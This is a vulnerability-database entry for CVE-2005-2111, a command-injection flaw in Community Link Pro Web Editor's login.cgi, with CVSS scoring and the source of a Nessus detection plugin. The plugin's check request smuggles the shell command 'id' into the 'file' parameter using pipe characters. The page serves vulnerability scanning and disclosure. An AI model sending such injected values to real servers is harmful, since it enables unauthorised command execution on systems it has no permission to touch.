Vulnerabilities > CVE-2005-2111 - Remote Security vulnerability in Community Link Pro Web Editor

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
community-link-pro-web-editor
nessus
NVD
Published: 2005-07-05
Updated: 2016-10-18

Summary

login.cgi in Community Link Pro Web Editor allows remote attackers to execute arbitrary commands via the file parameter.

Vulnerable Configurations

Part Description Count
Application
Community_Link_Pro_Web_Editor
1

Nessus

NASL familyCGI abuses
NASL idCOMMUNITY_LINK_PRO_LOGIN_REMOTE_CMD_EXEC.NASL
descriptionThe remote host is running Community Link Pro, a web-based application written in Perl. The remote version of this software fails to sanitize user input to the
last seen2020-06-01
modified2020-06-02
plugin id19305
published2005-07-27
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/19305
titleCommunity Link Pro login.cgi file Parameter Arbitrary Command Execution
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(19305);
 script_version("1.15");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 script_cve_id("CVE-2005-2111");
 script_bugtraq_id(14097);

 script_name(english:"Community Link Pro login.cgi file Parameter Arbitrary Command Execution");
 script_summary(english:"Checks for Community Link Pro webeditor login.cgi remote execution flaw");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that allows arbitrary
command execution.");
 script_set_attribute(attribute:"description", value:
"The remote host is running Community Link Pro, a web-based
application written in Perl. 

The remote version of this software fails to sanitize user input to
the 'file' parameter of the 'login.cgi' script of shell metacharacters
before using it to run a command.  An unauthenticated attacker can
leverage this issue to execute arbitrary commands on the remote host
subject to the privileges under which the web server operates.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Jun/265");
 script_set_attribute(attribute:"solution", value:
"There is no known solution at this time.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value:"2005/07/27");
 script_set_attribute(attribute:"vuln_publication_date", value:"2005/06/29");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2005-2020 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 script_dependencie("http_version.nasl");
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_ports("Services/www", 80);

 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");
include("global_settings.inc");
port = get_http_port(default:80, embedded:TRUE);

if(!get_port_state(port))exit(0);

http_check_remote_code_ka (
                        check_request:"/login.cgi?username=&command=simple&do=edit&password=&file=|id|",
                        check_result:"uid=[0-9]+.*gid=[0-9]+.*",
                        command:"id",
			extra_dirs:make_list("/app/webeditor")
                        );

References